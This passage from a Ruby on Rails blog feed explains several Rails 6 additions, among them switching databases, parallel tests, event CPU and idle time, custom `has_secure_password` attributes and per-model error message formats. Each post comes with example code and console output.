      <id>https://www.bigbinary.com/blog/rails-6-has-added-a-way-to-change-the-database-of-the-app</id>
<content type="html"><![CDATA[<p>Rails allows us to use different databases using the <code>database.yml</code> config file. It uses sqlite3 as the default database when a new Rails app is created. But it is also possible to use a different database such as MySQL or PostgreSQL. The contents of <code>database.yml</code> change as per the database. Each database also has a different adapter, so we need to include the <code>pg</code> or <code>mysql2</code> gem accordingly.</p><p>Before Rails 6, it was not possible to change the contents of <code>database.yml</code> automatically. But now a <a href="https://github.com/rails/rails/pull/34832">command has been added</a> to do this automatically.</p><p>Let's say our app started with sqlite and now we have to switch to MySQL.</p><pre><code class="language-bash">$ rails db:system:change --to=mysql
    conflict  config/database.yml
Overwrite /Users/prathamesh/Projects/reproductions/squish_app/config/database.yml? (enter &quot;h&quot; for help) [Ynaqdhm] Y
       force  config/database.yml
        gsub  Gemfile
        gsub  Gemfile</code></pre><p>Our <code>database.yml</code> is now changed to contain the configuration for the MySQL database, and the <code>Gemfile</code> also gets updated automatically with the addition of the <code>mysql2</code> gem in place of <code>sqlite3</code>.</p><p>This command also takes care of using <a href="https://github.com/rails/rails/pull/35522">proper gem versions</a> in the Gemfile when the database backend is changed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds parallel testing]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-parallel-testing"/>
      <updated>2019-04-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-parallel-testing</id>
      <content type="html"><![CDATA[<p>We frequently think about how good it would be if we could run tests in parallel locally, so there would be less wait time for tests to complete. Wait times increase considerably when the number of tests is on the higher side, which is a common case for a lot of applications.</p><p>Though CI tools like <a href="https://circleci.com/">CircleCI</a> and <a href="https://travis-ci.org/">Travis CI</a> provide a feature to run tests in parallel, there still wasn't a straightforward way to parallelize tests locally before Rails 6.</p><p>Before Rails 6, if we wanted to parallelize tests, we would use <a href="https://github.com/grosser/parallel_tests">Parallel Tests</a>.</p><p>Rails 6 adds parallelization of tests by default. Rails 6 added <a href="https://github.com/rails/rails/pull/31900">parallelize</a> as a class method on <a href="https://api.rubyonrails.org/v5.2/classes/ActiveSupport/TestCase.html">ActiveSupport::TestCase</a>, which takes a hash as a parameter with the keys <code>workers</code> and <code>with</code>. The <code>workers</code> key sets the number of parallel workers. Its default value is <code>:number_of_processors</code>, which finds the number of processors on the machine and uses it as the number of parallel workers. <code>with</code> takes two values - <code>:processes</code>, which is the default, and <code>:threads</code>.</p><p>Rails 6 also added two hooks - <code>parallelize_setup</code>, which runs when the processes are forked, and <code>parallelize_teardown</code>, which runs before the forked processes are closed. 
Rails 6 also handles creation of multiple databases and namespacing of those databases for parallel tests out of the box.</p><p>If we want to disable parallel testing, we can set the value of <code>workers</code> to 1 or less.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">class ActiveSupport::TestCase
  parallelize_setup do |worker|
    # setup databases
  end

  parallelize_teardown do |worker|
    # cleanup database
  end

  # Run tests in parallel with specified workers
  parallelize(workers: :number_of_processors)

  # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
  fixtures :all

  # Add more helper methods to be used by all tests here...
end</code></pre><p>Rails 6 also provides an environment variable <code>PARALLEL_WORKERS</code> to set the number of parallel workers at runtime.</p><pre><code class="language-bash">$ PARALLEL_WORKERS=10 bin/rails test</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31900">pull request</a> for adding <code>parallelize</code> and the <a href="https://github.com/rails/rails/pull/34735">pull request</a> for setting the number of processors as the default workers count.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 improves ActiveSupport::Notifications::Event]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-cpu-time-idle-time-and-allocations-to-activesupport-notifications-event"/>
      <updated>2019-04-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-cpu-time-idle-time-and-allocations-to-activesupport-notifications-event</id>
      <content type="html"><![CDATA[<p>Rails provides an easy way to instrument events and the ability to subscribe to those events using the <a href="https://guides.rubyonrails.org/active_support_instrumentation.html">Active Support Instrumentation</a> API.</p><h2>Before Rails 6</h2><p>Before Rails 6, the subscriber of an event can access the event's start time, end time and duration along with the other event information.</p><p>To demonstrate how to access this information from an event, we will instrument a custom event <code>custom_sleep_event</code> and attach a subscriber to that event.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('custom_sleep_event') do |*args|
  event = ActiveSupport::Notifications::Event.new(*args)

  puts &quot;Event: #{event.inspect}&quot;
  puts &quot;Started: #{event.time}&quot;
  puts &quot;Finished: #{event.end}&quot;
  puts &quot;Duration (ms): #{event.duration}&quot;
end

ActiveSupport::Notifications.instrument('custom_sleep_event') do
  sleep 2
end</code></pre><p>The event subscriber should print something similar.</p><pre><code class="language-plaintext">Event: #&lt;ActiveSupport::Notifications::Event:0x00007f952fc6a0b8 @name=&quot;custom_sleep_event&quot;, @payload={}, @time=2019-04-11 16:58:52 +0530, @transaction_id=&quot;e82231ab65b7af3c85ec&quot;, @end=2019-04-11 16:58:54 +0530, @children=[], @duration=nil&gt;
Started: 2019-04-11 16:58:52 +0530
Finished: 2019-04-11 16:58:54 +0530
Duration (ms): 2001.287</code></pre><h2>Improvements and additions made to ActiveSupport::Notifications::Event in Rails 6</h2><p>Rails 6 has improved the way an event's duration is computed and also added useful information accessible on an event object, such as CPU time, idle time and allocations.</p><p>Let's discuss it in more detail.</p><h5>1. <code>CLOCK_MONOTONIC</code> instead of <code>CLOCK_REALTIME</code></h5><p>Before Rails 6, <code>Time.now</code> was used for recording the event's start time and end time. 
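Wall-clock readings are vulnerable to system clock adjustments; a monotonic clock avoids this. A plain-Ruby sketch (independent of Rails) of measuring elapsed time the safe way:

```ruby
# Plain-Ruby sketch: measuring elapsed time with the monotonic clock.
# Unlike Time.now, these readings cannot jump backwards or forwards
# when the system time-of-day clock is changed mid-measurement.
start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
sleep 0.1
finish = Process.clock_gettime(Process::CLOCK_MONOTONIC)

elapsed_ms = (finish - start) * 1000
puts "Elapsed (ms): #{elapsed_ms.round(3)}"
```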
To avoid <a href="https://github.com/rails/rails/issues/34271">issues with the machine changing time</a>, Rails 6 now uses <a href="https://www.rubydoc.info/gems/concurrent-ruby/Concurrent.monotonic_time"><code>Concurrent.monotonic_time</code></a> instead of <code>Time.now</code> to record both the event's start time and end time accurately.</p><p>Initially <a href="https://ruby-doc.org/core-2.5.3/Process.html#method-c-clock_gettime"><code>Process.clock_gettime(Process::CLOCK_MONOTONIC)</code></a> was used, which was <a href="https://github.com/rails/rails/commit/dda9452314bb904a3e2c850bd23f118eb80e3356#diff-b82336d1f77b84d28210f9b46fcff97d">later modified</a> to use <code>Concurrent.monotonic_time</code>. Note that <code>Concurrent.monotonic_time</code> is the same but returns a more precise time than <code>Process.clock_gettime(Process::CLOCK_MONOTONIC)</code>.</p><blockquote><p><code>Time.now</code> or <code>Process.clock_gettime(Process::CLOCK_REALTIME)</code> can jump forwards and backwards as the system time-of-day clock is changed. In contrast, clock time using <code>CLOCK_MONOTONIC</code> returns the absolute wall-clock time since an unspecified point in the past (for example, system start-up time, or the Epoch). <code>CLOCK_MONOTONIC</code> does not change with the system time-of-day clock; it just keeps advancing forward at one tick per tick and resets if the system is rebooted. In general, <code>CLOCK_MONOTONIC</code> is recommended to compute the elapsed time between two events. To read more about the differences between <code>CLOCK_REALTIME</code> and <code>CLOCK_MONOTONIC</code>, please check the discussion on <a href="https://stackoverflow.com/questions/3523442/difference-between-clock-realtime-and-clock-monotonic">this Stack Overflow thread</a>. Another <a href="https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/">article</a> written by Luca Guidi on the same topic is a recommended read.</p></blockquote><h5>2. 
No need to create event objects by hand</h5><p>Since it is a common practice to initialize an event using <code>ActiveSupport::Notifications::Event.new(*args)</code> in the event subscriber block, <a href="https://github.com/rails/rails/pull/33451">Rails 6 now makes this a bit easier</a>. If the block passed to the subscriber takes only one argument, then the Active Support Notifications framework now yields an event object to the block.</p><p>Therefore, the subscriber definition below</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('an_event') do |*args|
  event = ActiveSupport::Notifications::Event.new(*args)

  puts &quot;Event #{event.name} received.&quot;
end</code></pre><p>can now be simplified in Rails 6 as follows.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('an_event') do |event|
  puts &quot;Event #{event.name} received.&quot;
end</code></pre><h5>3. CPU time and idle time</h5><p>Rails 6 now computes the elapsed CPU time of an event with the help of <a href="https://ruby-doc.org/core-2.5.3/Process.html#method-c-clock_gettime"><code>Process.clock_gettime(Process::CLOCK_PROCESS_CPUTIME_ID)</code></a>.</p><p>The system (kernel) keeps track of CPU time per process. The clock time returned using <code>CLOCK_PROCESS_CPUTIME_ID</code> represents the CPU time that has passed since the process started. Since a process may not always get all CPU cycles between its start and finish, it often has to (sleep and) share CPU time with other processes. If the system puts a process to sleep, then the time spent waiting is not counted in the process's CPU time.</p><p>The CPU time of an event can be fetched using the <code>#cpu_time</code> method.</p><p>Also, Rails 6 now computes the idle time of an event, too. 
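The distinction between CPU time and wall-clock time can be seen in plain Ruby (a sketch, independent of Rails): a sleeping process accumulates wall-clock time but almost no CPU time.

```ruby
# Plain-Ruby sketch: per-process CPU time vs wall-clock time.
# The kernel does not charge CPU time to a sleeping process,
# so cpu_ms stays near zero while wall_ms grows.
cpu_start  = Process.clock_gettime(Process::CLOCK_PROCESS_CPUTIME_ID)
wall_start = Process.clock_gettime(Process::CLOCK_MONOTONIC)

sleep 0.2

cpu_ms  = (Process.clock_gettime(Process::CLOCK_PROCESS_CPUTIME_ID) - cpu_start) * 1000
wall_ms = (Process.clock_gettime(Process::CLOCK_MONOTONIC) - wall_start) * 1000

puts "CPU time (ms): #{cpu_ms.round(3)}"
puts "Wall time (ms): #{wall_ms.round(3)}"
puts "Idle time (ms): #{(wall_ms - cpu_ms).round(3)}"
```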
The idle time of an event represents the difference between the event's <code>#duration</code> and <code>#cpu_time</code>. Note that <code>#duration</code> is computed as the difference between the event's monotonic time at the start (<code>#time</code>) and the monotonic time at the end (<code>#end</code>).</p><p>Let's see how to get these time values.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('custom_sleep_event') do |event|
  puts &quot;Event: #{event.inspect}&quot;
  puts &quot;Started: #{event.time}&quot;
  puts &quot;Finished: #{event.end}&quot;
  puts &quot;Duration (ms): #{event.duration}&quot;
  puts &quot;CPU time (ms): #{event.cpu_time}&quot;
  puts &quot;Idle time (ms): #{event.idle_time}&quot;
end

ActiveSupport::Notifications.instrument('custom_sleep_event') do
  sleep 2
end</code></pre><p>It prints this.</p><pre><code class="language-plaintext">Event: #&lt;ActiveSupport::Notifications::Event:0x00007fb02ac72400 @name=&quot;custom_sleep_event&quot;, @payload={}, @time=29514.525707, @transaction_id=&quot;43ca8e1c378b6b00d861&quot;, @end=29516.528971, @children=[], @duration=nil, @cpu_time_start=2.238801, @cpu_time_finish=2.238874, @allocation_count_start=835821, @allocation_count_finish=835821&gt;
Started: 29514.525707
Finished: 29516.528971
Duration (ms): 2003.2639999990351
CPU time (ms): 0.07299999999998974
Idle time (ms): 2003.190999999035</code></pre><p>Notice the <code>@cpu_time_start</code> and <code>@cpu_time_finish</code> counters in the inspected event object representation, which are used to calculate the CPU time.</p><h5>4. 
Allocations</h5><p>We can now know how many objects were allocated between the start and end of an event using the event's <code>#allocations</code> method.</p><pre><code class="language-ruby">ActiveSupport::Notifications.subscribe('custom_sleep_event') do |event|
  puts &quot;Event: #{event.inspect}&quot;
  puts &quot;Started: #{event.time}&quot;
  puts &quot;Finished: #{event.end}&quot;
  puts &quot;Duration (ms): #{event.duration}&quot;
  puts &quot;CPU time (ms): #{event.cpu_time}&quot;
  puts &quot;Idle time (ms): #{event.idle_time}&quot;
  puts &quot;# of objects allocated: #{event.allocations}&quot;
end

ActiveSupport::Notifications.instrument('custom_sleep_event') do
  sleep 2
end</code></pre><p>The above example should print something like this.</p><pre><code class="language-plaintext">Event: #&lt;ActiveSupport::Notifications::Event:0x00007fed8c4e33c0 @name=&quot;custom_sleep_event&quot;, @payload={}, @time=30503.508897, @transaction_id=&quot;5330165dae2b49fbe143&quot;, @end=30505.513547, @children=[], @duration=nil, @cpu_time_start=2.813231, @cpu_time_finish=2.813404, @allocation_count_start=834227, @allocation_count_finish=834228&gt;
Started: 30503.508897
Finished: 30505.513547
Duration (ms): 2004.6499999989464
CPU time (ms): 0.17299999999975668
Idle time (ms): 2004.4769999989467
# of objects allocated: 1</code></pre><p>Notice the <code>@allocation_count_start</code> and <code>@allocation_count_finish</code> counters in the inspected event object representation; their difference (834228 - 834227 = 1) is the number of objects allocated during the event.</p><blockquote><p>In case of JRuby, the <a href="https://github.com/rails/rails/blob/3e628c48406440811f9201e2db7ba0df53bb38e1/activesupport/lib/active_support/notifications/instrumenter.rb#L155-L157">allocations would be zero</a>.</p></blockquote><h5>5. 
<code>#start!</code> and <code>#finish!</code></h5><p>Two public methods, <code>#start!</code> and <code>#finish!</code>, have been introduced on <code>ActiveSupport::Notifications::Event</code>, which can be used to record more information.</p><p>The <code>#start!</code> method <a href="https://github.com/rails/rails/blob/45511fa8b20c621e2cf193ddaeb7d6fbe8432fea/activesupport/lib/active_support/notifications/instrumenter.rb#L79-L83">resets</a> the <code>@time</code>, <code>@cpu_time_start</code> and <code>@allocation_count_start</code> counters. Similarly, the <code>#finish!</code> method <a href="https://github.com/rails/rails/blob/45511fa8b20c621e2cf193ddaeb7d6fbe8432fea/activesupport/lib/active_support/notifications/instrumenter.rb#L86-L90">resets</a> the <code>@end</code>, <code>@cpu_time_finish</code> and <code>@allocation_count_finish</code> counters.</p><hr><p>To learn more about this feature, please check <a href="https://github.com/rails/rails/pull/33449">rails/rails#33449</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 allows configurable attribute on #has_secure_password]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-configurable-attribute-name-on-has_secure_password"/>
      <updated>2019-04-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-configurable-attribute-name-on-has_secure_password</id>
      <content type="html"><![CDATA[<p><a href="https://api.rubyonrails.org/v5.2/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password">has_secure_password</a> is used to encrypt and authenticate passwords using <a href="https://github.com/codahale/bcrypt-ruby">BCrypt</a>. It assumes the model has a column named <code>password_digest</code>.</p><p>Before Rails 6, <a href="https://api.rubyonrails.org/v5.2/classes/ActiveModel/SecurePassword/ClassMethods.html#method-i-has_secure_password">has_secure_password</a> did not accept any attribute as a parameter. So, if we needed <a href="https://github.com/codahale/bcrypt-ruby">BCrypt</a> encryption on a column other than <code>password_digest</code>, we would have to manually encrypt the value before storing it.</p><p>Rails 6 makes it easy and allows a custom attribute as a parameter to <code>has_secure_password</code>. <code>has_secure_password</code> still defaults to <code>password</code>, so it works with previous versions of Rails. 
<code>has_secure_password</code> still needs the column named <code>column_name_digest</code> defined on the model.</p><p><code>has_secure_password</code> also adds the <code>authenticate_column_name</code> method to authenticate the custom column.</p><p>Let's check out how it works.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   has_secure_password
&gt;&gt; end
=&gt; [ActiveModel::Validations::ConfirmationValidator]
&gt;&gt; user = User.create(email: 'amit.choudhary@bigbinary.com', password: 'amit.choudhary')
BEGIN
User Create (0.8ms)  INSERT INTO &quot;users&quot; (&quot;email&quot;, &quot;password_digest&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3, $4) RETURNING &quot;id&quot;  [[&quot;email&quot;, &quot;amit.choudhary@bigbinary.com&quot;], [&quot;password_digest&quot;, &quot;$2a$10$g6ZJNgakn4I1w/qjAx3vM.I76QSNjFCHtTtT9ovko/9Th50SEmIBO&quot;], [&quot;created_at&quot;, &quot;2019-03-17 23:30:13.754379&quot;], [&quot;updated_at&quot;, &quot;2019-03-17 23:30:13.754379&quot;]]
COMMIT
=&gt; #&lt;User id: 1, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: &quot;$2a$10$g6ZJNgakn4I1w/qjAx3vM.I76QSNjFCHtTtT9ovko/9...&quot;, created_at: &quot;2019-03-17 23:30:13&quot;, updated_at: &quot;2019-03-17 23:30:13&quot;&gt;
&gt;&gt; user.authenticate('amit.choudhary')
=&gt; #&lt;User id: 1, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: &quot;$2a$10$g6ZJNgakn4I1w/qjAx3vM.I76QSNjFCHtTtT9ovko/9...&quot;, created_at: &quot;2019-03-17 23:30:13&quot;, updated_at: &quot;2019-03-17 23:30:13&quot;&gt;
&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   has_secure_password :transaction_password
&gt;&gt; end
=&gt; NoMethodError: undefined method 'fetch' for :transaction_password:Symbol
from (irb):9:in '&lt;class:User&gt;'
from (irb):8</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   has_secure_password
&gt;&gt;   has_secure_password :transaction_password
&gt;&gt; end
=&gt; [ActiveModel::Validations::ConfirmationValidator]
&gt;&gt; user = User.create(email: 'amit.choudhary@bigbinary.com', password: 'amit.choudhary', transaction_password: 'amit.choudhary')
BEGIN
User Create (0.5ms)  INSERT INTO &quot;users&quot; (&quot;email&quot;, &quot;password_digest&quot;, &quot;transaction_password_digest&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, $3, $4, $5) RETURNING &quot;id&quot;  [[&quot;email&quot;, &quot;amit.choudhary@bigbinary.com&quot;], [&quot;password_digest&quot;, &quot;$2a$10$nUiO7E2XrIJx/sSdpG0JAOL00uFvPRH7kXHLk5f/6qA1zLPHIrpPy&quot;], [&quot;transaction_password_digest&quot;, &quot;$2a$10$l6cTpHwV9xOEn2.OumI29OnualGpvr1CgrNrbuMuHyGTltko8eBG2&quot;], [&quot;created_at&quot;, &quot;2019-03-17 23:42:28.723431&quot;], [&quot;updated_at&quot;, &quot;2019-03-17 23:42:28.723431&quot;]]
COMMIT
=&gt; #&lt;User id: 5, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: [FILTERED], transaction_password_digest: [FILTERED], created_at: &quot;2019-03-17 23:42:28&quot;, updated_at: &quot;2019-03-17 23:42:28&quot;&gt;
&gt;&gt; user.authenticate('amit.choudhary')
=&gt; #&lt;User id: 5, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: [FILTERED], transaction_password_digest: [FILTERED], created_at: &quot;2019-03-17 23:42:28&quot;, updated_at: &quot;2019-03-17 23:42:28&quot;&gt;
&gt;&gt; user.authenticate_transaction_password('amit.choudhary')
=&gt; #&lt;User id: 5, email: &quot;amit.choudhary@bigbinary.com&quot;, password_digest: [FILTERED], transaction_password_digest: [FILTERED], created_at: &quot;2019-03-17 23:42:28&quot;, updated_at: &quot;2019-03-17 23:42:28&quot;&gt;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/26764">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 allows overriding ActiveModel::Errors#full_message]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-allows-to-override-the-activemodel-errors-full_message-format-at-the-model-level-and-at-the-attribute-level"/>
      <updated>2019-04-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-allows-to-override-the-activemodel-errors-full_message-format-at-the-model-level-and-at-the-attribute-level</id>
      <content type="html"><![CDATA[<h2>Before Rails 6</h2><p>Before Rails 6, the default format <code>%{attribute} %{message}</code> is used to display the validation error message for a model's attribute.</p><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:title, &quot;cannot be blank&quot;)
=&gt; &quot;Title cannot be blank&quot;</code></pre><p>The default format can be overridden globally using a language-specific locale file.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  errors:
    format: &quot;'%{attribute}' %{message}&quot;</code></pre><p>With this change, the full error message is changed for all the attributes of all models.</p><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:title, &quot;cannot be blank&quot;)
=&gt; &quot;'Title' cannot be blank&quot;
&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)
=&gt; &quot;'First name' cannot be blank&quot;</code></pre><p>This trick works in some cases, but it doesn't work if we have to customize the error messages for specific models or attributes.</p><p>Before Rails 6, there was no easy way to generate error messages like the ones shown below.</p><pre><code class="language-plaintext">The article's title cannot be empty</code></pre><p>or</p><pre><code class="language-plaintext">First name of a person cannot be blank</code></pre><p>If we change the <code>errors.format</code> to <code>The article's %{attribute} %{message}</code> in <code>config/locales/en.yml</code> then that format will be 
unexpectedly used for other models, too.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  errors:
    format: &quot;The article's %{attribute} %{message}&quot;</code></pre><p>This is what will happen if we make such a change.</p><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:title, &quot;cannot be empty&quot;)
=&gt; &quot;The article's Title cannot be empty&quot;
&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)
=&gt; &quot;The article's First name cannot be blank&quot;</code></pre><p>Notice the error message generated for the <code>:first_name</code> attribute of the User model. This does not look the way we want, right?</p><p>Let's see what has changed in Rails 6 to overcome this problem.</p><h2>Enhancements made to <code>ActiveModel::Errors#full_message</code> in Rails 6</h2><p>Overriding the format of the error message globally using <code>errors.format</code> is still supported in Rails 6.</p><p>In addition to that, Rails 6 now also supports overriding the error message's format at the model level and at the attribute level.</p><p>In order to enable this support, we need to explicitly set <code>config.active_model.i18n_customize_full_message</code> to <code>true</code> in the Rails configuration, preferably in <code>config/application.rb</code>; it is implicitly set to <code>false</code> by default.</p><h5>Overriding model level format</h5><p>We can customize the full error message format for each model separately.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  activerecord:
    errors:
      models:
        article:
          format: &quot;`%{attribute}`: %{message}&quot;
        user:
          format: &quot;%{attribute} of the user 
%{message}&quot;</code></pre><p>The full error messages will look like this.</p><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:title, &quot;cannot be empty&quot;)
=&gt; &quot;`Title`: cannot be empty&quot;
&gt;&gt; article.valid?
=&gt; false
&gt;&gt; article.errors.full_messages
=&gt; [&quot;`Title`: can't be blank&quot;]
&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)
=&gt; &quot;First name of the user cannot be blank&quot;
&gt;&gt; comment = Comment.new
=&gt; #&lt;Comment id: nil, message: nil, author_id: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; comment.errors.full_message(:message, &quot;is required&quot;)
=&gt; &quot;Message is required&quot;</code></pre><p>Notice how the default format <code>%{attribute} %{message}</code> is used for generating the full error messages for the <code>Comment</code> model, since its format is not overridden.</p><p>Since the other methods such as <code>ActiveModel::Errors#full_messages</code>, <code>ActiveModel::Errors#full_messages_for</code>, <code>ActiveModel::Errors#to_hash</code> etc. 
use the <code>ActiveModel::Errors#full_message</code> method under the hood, the values returned by these methods contain the full error messages in the custom format, as expected.</p><h5>Overriding attribute level format</h5><p>Similar to customizing the format at the model level, we can customize the error format for specific attributes of individual models.</p><pre><code class="language-yaml"># config/locales/en.yml
en:
  activerecord:
    errors:
      models:
        article:
          attributes:
            title:
              format: &quot;The article's title %{message}&quot;
        user:
          attributes:
            first_name:
              format: &quot;%{attribute} of a person %{message}&quot;</code></pre><p>With such a configuration, we get the customized error message for the <code>title</code> attribute of the Article model.</p><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:title, &quot;cannot be empty&quot;)
=&gt; &quot;The article's title cannot be empty&quot;
&gt;&gt; article.errors.full_message(:description, &quot;cannot be empty&quot;)
=&gt; &quot;Description cannot be empty&quot;
&gt;&gt; user = User.new
=&gt; #&lt;User id: nil, first_name: nil, last_name: nil, country: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; user.errors.full_message(:first_name, &quot;cannot be blank&quot;)
=&gt; &quot;First name of a person cannot be blank&quot;
&gt;&gt; user.errors.full_message(:last_name, &quot;cannot be blank&quot;)
=&gt; &quot;Last name cannot be blank&quot;</code></pre><p>Note that the error messages for the rest of the attributes were generated using the default <code>%{attribute} %{message}</code> format, for which we didn't add custom formats in the <code>config/locales/en.yml</code> file.</p><h5>Overriding model level format of deeply nested models</h5><pre><code class="language-yaml"># 
config/locales/en.yml
en:
  activerecord:
    errors:
      models:
        article/comments/attachments:
          format: &quot;%{message}&quot;</code></pre><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:'comments/attachments.file_name', &quot;is required&quot;)
=&gt; &quot;is required&quot;
&gt;&gt; article.errors.full_message(:'comments/attachments.path', &quot;cannot be blank&quot;)
=&gt; &quot;cannot be blank&quot;
&gt;&gt; article.errors.full_message(:'comments.message', &quot;cannot be blank&quot;)
=&gt; &quot;Comments message cannot be blank&quot;</code></pre><h5>Overriding attribute level format of deeply nested models</h5><pre><code class="language-yaml"># config/locales/en.yml
en:
  activerecord:
    errors:
      models:
        article/comments/attachments:
          attributes:
            file_name:
              format: &quot;File name of an attachment %{message}&quot;</code></pre><pre><code class="language-ruby">&gt;&gt; article = Article.new
=&gt; #&lt;Article id: nil, title: nil, description: nil, created_at: nil, updated_at: nil&gt;
&gt;&gt; article.errors.full_message(:'comments/attachments.file_name', &quot;is required&quot;)
=&gt; &quot;File name of an attachment is required&quot;
&gt;&gt; article.errors.full_message(:'comments/attachments.path', &quot;cannot be blank&quot;)
=&gt; &quot;Comments/attachments path cannot be blank&quot;</code></pre><h2>Precedence</h2><p>The custom formats specified in the locale file have the following precedence, from high to low 
order.</p><ul><li><code>activerecord.errors.models.article/comments/attachments.attributes.file_name.format</code></li><li><code>activerecord.errors.models.article/comments/attachments.format</code></li><li><code>activerecord.errors.models.article.attributes.title.format</code></li><li><code>activerecord.errors.models.article.format</code></li><li><code>errors.format</code></li></ul><hr><p>To learn more, please check out <a href="https://github.com/rails/rails/pull/32956">rails/rails#32956</a> and <a href="https://github.com/rails/rails/pull/35789">rails/rails#35789</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#extract_associated]]></title>
       <author><name>Taha Husain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-extract_associated"/>
      <updated>2019-04-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-extract_associated</id>
      <content type="html"><![CDATA[<p>Before Rails 6, if we wanted to extract associated records from an <code>ActiveRecord::Relation</code>, we would use <code>preload</code> and <code>collect</code>.</p><p>For example, say we want to fetch the <code>subscriptions</code> of some <code>users</code>. The query would look as shown below.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">User.where(blocked: false).preload(:subscriptions).collect(&amp;:subscriptions)
=&gt; # returns a collection of subscription records</code></pre><p><a href="https://github.com/rails/rails/pull/35784">ActiveRecord::Relation#extract_associated</a> provides a shorthand to achieve the same result and is more readable than the former.</p><h4>Rails 6.0.0.beta3</h4><pre><code class="language-ruby">User.where(blocked: false).extract_associated(:subscriptions)
=&gt; # returns the same collection of subscription records</code></pre><p>Here's the relevant <a href="https://github.com/rails/rails/pull/35784">pull request</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds implicit_order_column]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-implicit_order_column"/>
      <updated>2019-04-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-implicit_order_column</id>
